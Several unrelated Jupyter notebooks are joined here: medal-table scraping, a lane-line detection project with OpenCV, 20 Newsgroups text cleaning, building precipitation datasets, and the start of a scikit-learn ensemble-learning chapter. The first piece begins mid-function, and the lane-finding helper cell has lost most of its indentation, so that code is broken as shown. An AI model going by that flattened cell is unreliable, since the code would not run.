            country = h[int(match.end()):int(match.end()) + 200].rsplit('"')[0]
            all_countries_format.append(country)
            countries.append(country.lower().replace(" ", "-"))
        sports_countries[s] = countries
        for c in sports_countries[s]:
            if c == 'great-britain-&-n.-ireland':
                ci1 = 'great-britain-and-northern-ireland'
                medals[s][c] = {}
                for m in medal_names:
                    pattern = r"<abbr class=\"abbr-on medium-abbr-off\" title=\".{,800}" + m + ".{,150}" + ci1 + "\">"
                    gendermatch = re.finditer(pattern, h)
                    for i, match in enumerate(gendermatch):
                        medals[s][c][m] = int(h[int(match.end()):int(match.end()) + 3])
            else:
                ci = c
                medals[s][ci] = {}
                for m in medal_names:
                    pattern = r"<abbr class=\"abbr-on medium-abbr-off\" title=\".{,500}" + m + ".{,150}" + ci + "\">"
                    gendermatch = re.finditer(pattern, h)
                    for i, match in enumerate(gendermatch):
                        medals[s][ci][m] = int(h[int(match.end()):int(match.end()) + 3])
        print(medals[s])
```
# Create dataframe of medals
```
import numpy as np
all_countries_format = list(np.unique(all_countries_format))
all_countries_format.remove('Great Britain & N. Ireland')
all_countries_format.append('Great Britain')
all_countries_format_list = list(np.unique(all_countries_format))
import pandas as pd
# Create an empty dataframe
columns = ['country','sport','medal','N']
df = pd.DataFrame(columns=columns)
# Identify all countries with at least 1 medal
from functools import reduce  # reduce lives in functools in Python 3
countries_list = list(set(reduce(lambda x, y: x + y, sports_countries.values())))
countries_list = sorted(countries_list)
# Fill dataframe
for s in sports_names:
    if thtmls[s]:
        for i, c in enumerate(countries_list):
            ci = all_countries_format_list[i]
            for m in medal_names:
                if c in sports_countries[s]:
                    rowtemp = [ci, s, m, medals[s][c][m]]
                else:
                    rowtemp = [ci, s, m, 0]
                dftemp = pd.DataFrame([rowtemp], columns=columns)
                # DataFrame.append was removed in pandas 2.0; use pd.concat
                df = pd.concat([df, dftemp], ignore_index=True)
```
# Save dataframe
```
df.to_csv('now_medals.csv')
```
# Self-Driving Car Engineer Nanodegree
## Project: **Finding Lane Lines on the Road**
***
In this project, you will use the tools you learned about in the lesson to identify lane lines on the road. You can develop your pipeline on a series of individual images, and later apply the result to a video stream (really just a series of images). Check out the video clip "raw-lines-example.mp4" (also contained in this repository) to see what the output should look like after using the helper functions below.
Once you have a result that looks roughly like "raw-lines-example.mp4", you'll need to get creative and try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video "P1_example.mp4". Ultimately, you would like to draw just one line for the left side of the lane, and one for the right.
In addition to implementing code, there is a brief writeup to complete. The writeup should be completed in a separate file, which can be either a markdown file or a pdf document. There is a [write up template](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) that can be used to guide the writing process. Completing both the code in the Ipython notebook and the writeup template will cover all of the [rubric points](https://review.udacity.com/#!/rubrics/322/view) for this project.
---
Let's have a look at our first image called 'test_images/solidWhiteRight.jpg'. Run the 2 cells below (hit Shift-Enter or the "play" button above) to display the image.
**Note: If, at any point, you encounter frozen display windows or other confounding issues, you can always start again with a clean slate by going to the "Kernel" menu above and selecting "Restart & Clear Output".**
---
**The tools you have are color selection, region of interest selection, grayscaling, Gaussian smoothing, Canny Edge Detection and Hough Transform line detection. You are also free to explore and try other techniques that were not presented in the lesson. Your goal is to piece together a pipeline to detect the line segments in the image, then average/extrapolate them and draw them onto the image for display (as below). Once you have a working pipeline, try it out on the video stream below.**
---
<figure>
<img src="examples/line-segments-example.jpg" width="380" alt="Combined Image" />
<figcaption>
<p></p>
<p style="text-align: center;"> Your output should look something like this (above) after detecting line segments using the helper functions below </p>
</figcaption>
</figure>
<p></p>
<figure>
<img src="examples/laneLines_thirdPass.jpg" width="380" alt="Combined Image" />
<figcaption>
<p></p>
<p style="text-align: center;"> Your goal is to connect/average/extrapolate line segments to get output like this</p>
</figcaption>
</figure>
**Run the cell below to import some packages. If you get an `import error` for a package you've already installed, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**
## Import Packages
```
#importing some useful packages
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import math
import pdb, os
from collections.abc import Mapping
%matplotlib inline
```
## Read in an Image
```
#reading in an image
image = mpimg.imread('test_images/solidWhiteRight.jpg')
#printing out some stats and plotting
print('This image is:', type(image), 'with dimensions:', image.shape)
plt.imshow(image) # if you wanted to show a single color channel image called 'gray', for example, call as plt.imshow(gray, cmap='gray')
```
## Ideas for Lane Detection Pipeline
**Some OpenCV functions (beyond those introduced in the lesson) that might be useful for this project are:**
`cv2.inRange()` for color selection
`cv2.fillPoly()` for regions selection
`cv2.line()` to draw lines on an image given endpoints
`cv2.addWeighted()` to coadd / overlay two images
`cv2.cvtColor()` to grayscale or change color
`cv2.imwrite()` to output images to file
`cv2.bitwise_and()` to apply a mask to an image
**Check out the OpenCV documentation to learn about these and discover even more awesome functionality!**
```
# Helper Functions
def show_img(img_dict):
if not isinstance(img_dict, Mapping):
plt.imshow(img_dict)
return
    elif len(img_dict) == 1:
        plt.imshow(list(img_dict.values())[0])  # dict.values() is a view, not subscriptable
        return
else:
col = 3
row = 1
values_list = list(img_dict.values())
fig, axes = plt.subplots(row, col, figsize = (16, 8))
fig.subplots_adjust(hspace = 0.1, wspace = 0.2)
        axes = axes.ravel()  # ravel() returns a new array; assign the result
axes[0].imshow(values_list[0])
axes[1].imshow(values_list[1])
axes[2].imshow(values_list[2])
def grayscale(img):
return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
def canny(img, low_threshold, high_threshold):
return cv2.Canny(img, low_threshold, high_threshold)
def gaussian_blur(img, kernel_size):
return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)
def region_of_interest(img, vertices):
"""
Only keeps the region of the image defined by the polygon
formed from `vertices`. The rest of the image is set to black.
`vertices` should be a numpy array of integer points.
"""
#defining a blank mask to start with
mask = np.zeros_like(img)
#defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
#filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
#returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap, default):
"""
`img` should be the output of a Canny transform.
Returns an image with hough lines drawn.
"""
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
if default:
draw_default_lines(line_img, lines)
else:
draw_lines(line_img, lines)
return line_img
# Python 3 has support for cool math symbols.
def weighted_img(img, initial_img, α=0.8, β=1., γ=0.):
"""
`img` is the output of the hough_lines(), An image with lines drawn on it.
Should be a blank image (all black) with lines drawn on it.
`initial_img` should be the image before any processing.
The result image is computed as follows:
initial_img * α + img * β + γ
NOTE: initial_img and img must be the same shape!
"""
return cv2.addWeighted(initial_img, α, img, β, γ)
def draw_default_lines(img, lines, color=[255, 0, 0], thickness=5):
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def draw_lines(img, lines, color=[255, 0, 0], thickness=10):
"""
This function draws `lines` with `color` and `thickness`.
Lines are drawn on the image inplace (mutates the image).
    If you want to make the lines semi-transparent, think about combining
    this function with the weighted_img() function defined above
"""
# Track gradient and intercept of left and right lane
left_slope = []
left_intercept = []
left_y = []
right_slope = []
right_intercept = []
right_y = []
for line in lines:
for x1,y1,x2,y2 in line:
slope = (y2-y1)/(x2-x1)
intercept = y2 - (slope*x2)
# right lane
if slope > 0.0 and slope < math.inf and abs(slope) > 0.3:
right_slope.append(slope)
right_intercept.append(intercept)
right_y.append(y1)
right_y.append(y2)
# left lane
elif slope < 0.0 and slope > -math.inf and abs(slope) > 0.3:
left_slope.append(slope)
left_intercept.append(intercept)
left_y.append(y1)
left_y.append(y2)
y_min = min(min(left_y), min(right_y)) + 40
y_max = img.shape[0]
l_m = np.mean(left_slope)
l_c = np.mean(left_intercept)
r_m = np.mean(right_slope)
r_c = np.mean(right_intercept)
l_x_max = int((y_max - l_c)/l_m)
l_x_min = int((y_min - l_c)/l_m)
r_x_max = int((y_max - r_c)/r_m)
r_x_min = int((y_min - r_c)/r_m)
#pdb.set_trace()
cv2.line(img, (l_x_max, y_max),(l_x_min, y_min), color, thickness)
cv2.line(img, (r_x_max, y_max),(r_x_min, y_min), color, thickness)
```
## Build a Lane Finding Pipeline
Build the pipeline and run your solution on all test_images. Make copies into the `test_images_output` directory, and you can use the images in your writeup report.
Try tuning the various parameters, especially the low and high Canny thresholds as well as the Hough lines parameters.
```
# This cell creates a dictionary of all of the images in 'test_images' folder
def get_images(IMG_PATH = None):
if IMG_PATH == None:
test_imgs = os.listdir("test_images/")
IMG_PATH = "test_images/"
else:
test_imgs = os.listdir(IMG_PATH)
# create an array that contains all test images
img_dict = {}
for image in test_imgs:
img_dict[image] = mpimg.imread(os.path.join(IMG_PATH, image))
return img_dict
# outputs lanes for all images in image dictionary
def interpolate(lanes, img):
# Interpolating lines
result = weighted_img(lanes, img)
return result
def get_lanes(img_dict, default = False):
if isinstance(img_dict, Mapping):
for image in img_dict.keys():
test_img = img_dict[image]
# Converting to grayscale
gray_img = grayscale(test_img)
blur_img = gaussian_blur(gray_img, kernel_size = 3)
# Computing Edges
edges = canny(blur_img, low_threshold = 75, high_threshold = 150)
# Extracting Region of Interest
points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)
ROI = region_of_interest(edges, [points])
# Performing Hough Transform and draw lanes
lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)
if default:
img_dict[image] = lanes
else:
res = interpolate(lanes, test_img)
img_dict[image] = res
return img_dict
# from video frames
else:
gray_img = grayscale(img_dict)
blur_img = gaussian_blur(gray_img, kernel_size = 3)
# Computing Edges
edges = canny(blur_img, low_threshold = 75, high_threshold = 150)
# Extracting Region of Interest
points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)
ROI = region_of_interest(edges, [points])
# Performing Hough Transform and draw lanes
lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)
res = interpolate(lanes, img_dict)
return res
img_dict = get_images()
show_img(img_dict)
default_lanes = get_lanes(img_dict, True)
show_img(default_lanes)
img_dict = get_images()
final_output = get_lanes(img_dict)
show_img(final_output)
# This block will automatically compute and save the lanes to the folder 'test_images_output'
def compute_test_images(img_dict):
    # compute the lanes for all test_images
    lanes_dict = get_lanes(img_dict)
    # save outputs to 'test_images_output'
    PATH = 'test_images_output/'
    for image in lanes_dict.keys():
        mpimg.imsave(os.path.join(PATH, image), lanes_dict[image])
compute_test_images(img_dict)
```
## Test on Videos
You know what's cooler than drawing lanes over images? Drawing lanes over video!
We can test our solution on two provided videos:
`solidWhiteRight.mp4`
`solidYellowLeft.mp4`
**Note: if you get an import error when you run the next cell, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**
**If you get an error that looks like this:**
```
NeedDownloadError: Need ffmpeg exe.
You can download it by calling:
imageio.plugins.ffmpeg.download()
```
**Follow the instructions in the error message and check out [this forum post](https://discussions.udacity.com/t/project-error-of-test-on-videos/274082) for more troubleshooting tips across operating systems.**
```
# Import everything needed to edit/save/watch video clips
from moviepy.editor import VideoFileClip
from IPython.display import HTML
def process_image(image):
# NOTE: The output you return should be a color image (3 channel) for processing video below
# TODO: put your pipeline here,
# you should return the final output (image where lines are drawn on lanes)
result = get_lanes(image)
return result
```
Let's try the one with the solid white lane on the right first ...
```
white_output = 'test_videos_output/solidWhiteRight.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4")
white_clip = clip1.fl_image(process_image) #NOTE: this function expects color images!!
%time white_clip.write_videofile(white_output, audio=False)
```
Play the video inline, or if you prefer find the video in your filesystem (should be in the same directory) and play it in your video player of choice.
```
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(white_output))
```
## Improve the draw_lines() function
**At this point, if you were successful with making the pipeline and tuning parameters, you probably have the Hough line segments drawn onto the road, but what about identifying the full extent of the lane and marking it clearly as in the example video (P1_example.mp4)? Think about defining a line to run the full length of the visible lane based on the line segments you identified with the Hough Transform. As mentioned previously, try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video "P1_example.mp4".**
**Go back and modify your draw_lines function accordingly and try re-running your pipeline. The new output should draw a single, solid line over the left lane line and a single, solid line over the right lane line. The lines should start from the bottom of the image and extend out to the top of the region of interest.**
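The averaging/extrapolation step described above can be sketched as follows. This is a minimal illustration, not the project's starter code: the helper name `average_lane_lines`, the slope threshold, and the default image coordinates are all assumptions you would adapt to your own pipeline.

```
import numpy as np

def average_lane_lines(segments, y_bottom=540, y_top=330):
    """Average Hough segments into one solid line per lane side.

    segments: iterable of (x1, y1, x2, y2) pixel coordinates.
    Returns a dict mapping 'left'/'right' to (x_bottom, y_bottom, x_top, y_top).
    """
    fits = {"left": [], "right": []}
    for x1, y1, x2, y2 in segments:
        if x2 == x1:
            continue  # skip vertical segments (undefined slope)
        slope = (y2 - y1) / (x2 - x1)
        if abs(slope) < 0.3:
            continue  # ignore near-horizontal noise
        intercept = y1 - slope * x1
        # image y grows downward, so the left lane has negative slope
        fits["left" if slope < 0 else "right"].append((slope, intercept))

    lanes = {}
    for side, pairs in fits.items():
        if not pairs:
            continue
        slope, intercept = np.mean(pairs, axis=0)
        x_bottom = int((y_bottom - intercept) / slope)
        x_top = int((y_top - intercept) / slope)
        lanes[side] = (x_bottom, y_bottom, x_top, y_top)
    return lanes
```

The two resulting endpoint pairs can then be drawn with `cv2.line` inside `draw_lines` to produce one solid line per lane.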
Now for the one with the solid yellow lane on the left. This one's more tricky!
```
yellow_output = 'test_videos_output/solidYellowLeft.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip2 = VideoFileClip('test_videos/solidYellowLeft.mp4').subclip(0,5)
clip2 = VideoFileClip('test_videos/solidYellowLeft.mp4')
yellow_clip = clip2.fl_image(process_image)
%time yellow_clip.write_videofile(yellow_output, audio=False)
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(yellow_output))
```
## Writeup and Submission
If you're satisfied with your video outputs, it's time to make the report writeup in a pdf or markdown file. Once you have this Ipython notebook ready along with the writeup, it's time to submit for review! Here is a [link](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) to the writeup template file.
## Optional Challenge
Try your lane finding pipeline on the video below. Does it still work? Can you figure out a way to make it more robust? If you're up for the challenge, modify your pipeline so it works with this video and submit it along with the rest of your project!
```
challenge_output = 'test_videos_output/challenge.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip3 = VideoFileClip('test_videos/challenge.mp4').subclip(0,5)
clip3 = VideoFileClip('test_videos/challenge.mp4')
challenge_clip = clip3.fl_image(process_image)
%time challenge_clip.write_videofile(challenge_output, audio=False)
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(challenge_output))
```
|
github_jupyter
|
```
import os
import sys
import pandas as pd
import re
# pd.set_option('display.max_colwidth', -1)
```
Read data and split into texts and labels
```
BASE_DIR = ''
GLOVE_DIR = os.path.join(BASE_DIR, 'glove.6B')
TEXT_DATA_DIR = os.path.join(BASE_DIR, '20_newsgroups')
# This code is from https://www.kaggle.com/mansijharia, with some edits
# May take a little while to run
texts = []
labels_index = {}
labels = []
for name in sorted(os.listdir((BASE_DIR+'20_newsgroups'))):
path = os.path.join(BASE_DIR,'20_newsgroups', name)
if os.path.isdir(path):
label_id = len(labels_index)
labels_index[name] = label_id
for fname in sorted(os.listdir(path)):
if fname.isdigit():
fpath = os.path.join(path, fname)
args = {} if sys.version_info < (3,) else {'encoding': 'latin-1'}
with open(fpath, **args) as f:
t = f.read()
                    # Skip the metadata in the first paragraph.
i = t.find('\n\n')
if 0 < i:
t = t[i:]
texts.append(t)
labels.append(label_id)
print('Found %s texts.' % len(texts))
print('Found %s labels.' % len(labels))
dict(labels_index.items())
```
- First remove the metadata by dropping the first paragraph.
- Some metadata spans two paragraphs; we will handle those with a regular expression.
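One way to handle headers that span more than one paragraph is to keep skipping leading paragraphs while every line in them still looks like `Key: value` metadata. This is a sketch under that assumption — the helper name `strip_metadata` and the header regex are illustrative, not part of the notebook:

```
import re

HEADER_LINE = re.compile(r'^[\w-]+:\s')  # e.g. "Subject: ...", "Lines: 12"

def strip_metadata(text):
    """Drop leading paragraphs that consist only of 'Key: value' header lines."""
    paragraphs = text.split('\n\n')
    while paragraphs and all(HEADER_LINE.match(line)
                             for line in paragraphs[0].splitlines() if line.strip()):
        paragraphs.pop(0)
    return '\n\n'.join(paragraphs)
```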
```
# for i in range(0,len(texts)):
# match = re.search(r'([\w\.-]+)@([\w\.-]+)', texts[i])
# if texts[i]!= None:
# print(match)# just to show result
# #so long output
#no need
for i in range(0,len(texts)):
texts[i]= texts[i].strip() #To remove spaces from the beginning and the end of a string
```
# All these steps will be ordered and collected into the cleaning method in the process_data.py file.
#### Try i in (0, 5, 7644, 5432, 567)
```
#just one sample to show the work
# you can change the value of i
i=0
print('before:',texts[i])
print('the length is',len(texts[i]))
texts[i]= texts[i].strip() #To remove spaces from the beginning and the end
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\=+','', texts[i])#To remove any == characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\|+','', texts[i])#To remove any | characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\(\)+','', texts[i])#To remove any () empty parentheses
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\[\]+','', texts[i])#To remove any [] characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub("[<>]", " ",texts[i])#To remove < and > characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub('([\w\.-]+)@([\w\.-]+)','', texts[i])#To remove any emails
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub(r"/*\\*/*",'', texts[i])#To remove \/ characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub('\^+','', texts[i])#To remove ^ characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub("[__]+", " ", texts[i])# To remove runs of underscores
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub('--+', ' ', texts[i])# To remove runs of dashes
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub(r'\~\~+', '', texts[i])# To remove runs of ~~ characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub("\n", " ", texts[i])# To remove newlines
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub('\t', ' ', texts[i])# To remove tabs
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(' +', ' ',texts[i])#To remove multiple spaces
print('after:',texts[i])
print('the length is',len(texts[i]))
```
## Note: changing the order of these steps will change the result
# We likely also need to remove very long words and stray special characters, but that step will be handled in the tokenization process
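The individual substitutions demonstrated above can be collected into a single function of the kind destined for `process_data.py`. This is only a sketch — `clean_text` is a placeholder name, and the exact patterns/order should be tuned as noted:

```
import re

# (pattern, replacement) pairs applied in order -- the order matters, as noted above
CLEANING_STEPS = [
    (r'([\w\.-]+)@([\w\.-]+)', ''),   # e-mail addresses
    (r'=+|\|+|\^+|~~+', ''),          # runs of =, |, ^ and ~~
    (r'\(\)|\[\]', ''),               # empty () and []
    (r'[<>]', ' '),                   # angle brackets
    (r'/*\\+/*', ''),                 # backslash art such as \/ or \\
    (r'_+|--+', ' '),                 # underscore runs and long dashes
    (r'[\n\t]', ' '),                 # newlines and tabs
    (r' +', ' '),                     # collapse repeated spaces
]

def clean_text(text):
    text = text.strip()
    for pattern, repl in CLEANING_STEPS:
        text = re.sub(pattern, repl, text)
    return text.strip()
```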
```
####################### Doesn't work #######################
# match=re.match('Version: ', texts[1])
# if match:
# index = match.start()
# # print(texts[0:index])
# texts[i]=texts[0:index]
#
```
|
github_jupyter
|
```
import torch
from torch.nn import functional as F
from torch import nn
from pytorch_lightning.core.lightning import LightningModule
import pytorch_lightning as pl
import torch.optim as optim
import torchvision
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from src.models import *
from src.dataloader import *
from src.utils import *
import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
import pickle
import json
```
## Train and Val
```
data_dir = '/home/jupyter/data/'
args = {'tigge_dir':data_dir + f'tigge/32km/',
'tigge_vars':['total_precipitation_ens10','total_column_water', '2m_temperature', 'convective_available_potential_energy', 'convective_inhibition'],
'mrms_dir':data_dir + f'mrms/4km/RadarOnly_QPE_06H/',
'rq_fn':data_dir + f'mrms/4km/RadarQuality.nc',
# 'const_fn':data_dir + 'tigge/32km/constants.nc',
# 'const_vars':['orog', 'lsm'],
'data_period':('2018-01', '2019-12'),
'val_days':1,
'split':'train',
# 'pure_sr_ratio':8,
'tp_log':0.01,
'scale':True,
'ensemble_mode':'stack_by_variable',
'pad_tigge':15,
'pad_tigge_channel': True,
'idx_stride': 8
}
save_dir = '/home/jupyter/data/data_patches/'
dataset_name = 'ensemble_tp_x10_added_vars_TCW-T-CAPE-CIN_log_trans_padded_15_channel'  # needed by the pickle filenames below
ds_train = TiggeMRMSDataset(**args)
# pickle.dump(args, open(save_dir+'train/configs/dataset_args.pkl', 'wb'))
#save_images(ds_train, save_dir, 'train')
pickle.dump(ds_train, open(data_dir + f"saved_datasets/traindataset_{dataset_name}.pkl", "wb"))
pickle.dump(args, open(data_dir + f"saved_datasets/traindataset_{dataset_name}_args.pkl", "wb"))
val_args = args.copy()  # shallow copy so we don't mutate the training args in place
val_args['maxs'] = ds_train.maxs
val_args['mins'] = ds_train.mins
val_args['split'] = 'valid'
ds_valid = TiggeMRMSDataset(**val_args)  # needed by len(ds_valid) and save_images below
pickle.dump(val_args, open(save_dir+'valid/configs/dataset_args.pkl', 'wb'))
len(ds_valid)
save_images(ds_valid, save_dir, 'valid')
#pickle.dump(ds_valid, open(data_dir + f"saved_datasets/validdataset_{dataset_name}.pkl", "wb"))
#pickle.dump(val_args, open(data_dir + f"saved_datasets/validdataset_{dataset_name}_args.pkl", "wb"))
val_args = pickle.load(open('/home/jupyter/data/data_patches/valid/configs/dataset_args.pkl', 'rb'))
test_args = args.copy()  # shallow copy of the shared arguments
test_args['href_dir'] = data_dir + 'hrefv2/4km/total_precipitation/2020*.nc'
test_args['maxs'] = val_args['maxs']
test_args['mins'] = val_args['mins']
test_args.pop('val_days')
test_args.pop('split')
test_args['first_days'] = 5
test_args['data_period'] = ('2020-01', '2020-12')
test_dataset_name = dataset_name + f"_first_days_{test_args['first_days']}"  # used by the pickle filenames below
ds_test = TiggeMRMSHREFDataset(**test_args)
save_images(ds_test, save_dir, 'test')
pickle.dump(test_args, open(save_dir+'test/configs/dataset_args.pkl', 'wb'))
len(ds_test)
pickle.dump(ds_test, open(data_dir + f"saved_datasets/testdataset_{test_dataset_name}.pkl", "wb"))
pickle.dump(test_args, open(data_dir + f"saved_datasets/testdataset_{test_dataset_name}_args.pkl", "wb"))
print("check")
```
|
github_jupyter
|
**Chapter 7 – Ensemble Learning and Random Forests**
_This notebook contains all the sample code and solutions to the exercises in chapter 7._
<table align="left">
<td>
<a target="_blank" href="https://colab.research.google.com/github/ageron/handson-ml2/blob/master/07_ensemble_learning_and_random_forests.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
</table>
# Setup
First, let's import a few common modules, ensure MatplotLib plots figures inline and prepare a function to save the figures. We also check that Python 3.5 or later is installed (although Python 2.x may work, it is deprecated so we strongly recommend you use Python 3 instead), as well as Scikit-Learn ≥0.20.
```
# Python ≥3.5 is required
import sys
assert sys.version_info >= (3, 5)
# Scikit-Learn ≥0.20 is required
import sklearn
assert sklearn.__version__ >= "0.20"
# Common imports
import numpy as np
import os
# to make this notebook's output stable across runs
np.random.seed(42)
# To plot pretty figures
%matplotlib inline
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rc('axes', labelsize=14)
mpl.rc('xtick', labelsize=12)
mpl.rc('ytick', labelsize=12)
# Where to save the figures
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "ensembles"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
os.makedirs(IMAGES_PATH, exist_ok=True)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
print("Saving figure", fig_id)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
```
# Voting classifiers
```
heads_proba = 0.51
coin_tosses = (np.random.rand(10000, 10) < heads_proba).astype(np.int32)
cumulative_heads_ratio = np.cumsum(coin_tosses, axis=0) / np.arange(1, 10001).reshape(-1, 1)
plt.figure(figsize=(8,3.5))
plt.plot(cumulative_heads_ratio)
plt.plot([0, 10000], [0.51, 0.51], "k--", linewidth=2, label="51%")
plt.plot([0, 10000], [0.5, 0.5], "k-", label="50%")
plt.xlabel("Number of coin tosses")
plt.ylabel("Heads ratio")
plt.legend(loc="lower right")
plt.axis([0, 10000, 0.42, 0.58])
save_fig("law_of_large_numbers_plot")
plt.show()
from sklearn.model_selection import train_test_split
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=500, noise=0.30, random_state=42)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
```
**Note**: to be future-proof, we set `solver="lbfgs"`, `n_estimators=100`, and `gamma="scale"` since these will be the default values in upcoming Scikit-Learn versions.
```
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
log_clf = LogisticRegression(solver="lbfgs", random_state=42)
rnd_clf = RandomForestClassifier(n_estimators=100, random_state=42)
svm_clf = SVC(gamma="scale", random_state=42)
voting_clf = VotingClassifier(
estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],
voting='hard')
voting_clf.fit(X_train, y_train)
from sklearn.metrics import accuracy_score
for clf in (log_clf, rnd_clf, svm_clf, voting_clf):
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print(clf.__class__.__name__, accuracy_score(y_test, y_pred))
```
Soft voting:
```
log_clf = LogisticRegression(solver="lbfgs", random_state=42)
rnd_clf = RandomForestClassifier(n_estimators=100, random_state=42)
svm_clf = SVC(gamma="scale", probability=True, random_state=42)
voting_clf = VotingClassifier(
estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],
voting='soft')
voting_clf.fit(X_train, y_train)
from sklearn.metrics import accuracy_score
for clf in (log_clf, rnd_clf, svm_clf, voting_clf):
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print(clf.__class__.__name__, accuracy_score(y_test, y_pred))
```
# Bagging ensembles
```
from sklearn.ensemble import BaggingClassifier
from sklearn.tree import DecisionTreeClassifier
bag_clf = BaggingClassifier(
DecisionTreeClassifier(random_state=42), n_estimators=500,
max_samples=100, bootstrap=True, random_state=42)
bag_clf.fit(X_train, y_train)
y_pred = bag_clf.predict(X_test)
from sklearn.metrics import accuracy_score
print(accuracy_score(y_test, y_pred))
tree_clf = DecisionTreeClassifier(random_state=42)
tree_clf.fit(X_train, y_train)
y_pred_tree = tree_clf.predict(X_test)
print(accuracy_score(y_test, y_pred_tree))
from matplotlib.colors import ListedColormap
def plot_decision_boundary(clf, X, y, axes=[-1.5, 2.45, -1, 1.5], alpha=0.5, contour=True):
x1s = np.linspace(axes[0], axes[1], 100)
x2s = np.linspace(axes[2], axes[3], 100)
x1, x2 = np.meshgrid(x1s, x2s)
X_new = np.c_[x1.ravel(), x2.ravel()]
y_pred = clf.predict(X_new).reshape(x1.shape)
custom_cmap = ListedColormap(['#fafab0','#9898ff','#a0faa0'])
plt.contourf(x1, x2, y_pred, alpha=0.3, cmap=custom_cmap)
if contour:
custom_cmap2 = ListedColormap(['#7d7d58','#4c4c7f','#507d50'])
plt.contour(x1, x2, y_pred, cmap=custom_cmap2, alpha=0.8)
plt.plot(X[:, 0][y==0], X[:, 1][y==0], "yo", alpha=alpha)
plt.plot(X[:, 0][y==1], X[:, 1][y==1], "bs", alpha=alpha)
plt.axis(axes)
plt.xlabel(r"$x_1$", fontsize=18)
plt.ylabel(r"$x_2$", fontsize=18, rotation=0)
fig, axes = plt.subplots(ncols=2, figsize=(10,4), sharey=True)
plt.sca(axes[0])
plot_decision_boundary(tree_clf, X, y)
plt.title("Decision Tree", fontsize=14)
plt.sca(axes[1])
plot_decision_boundary(bag_clf, X, y)
plt.title("Decision Trees with Bagging", fontsize=14)
plt.ylabel("")
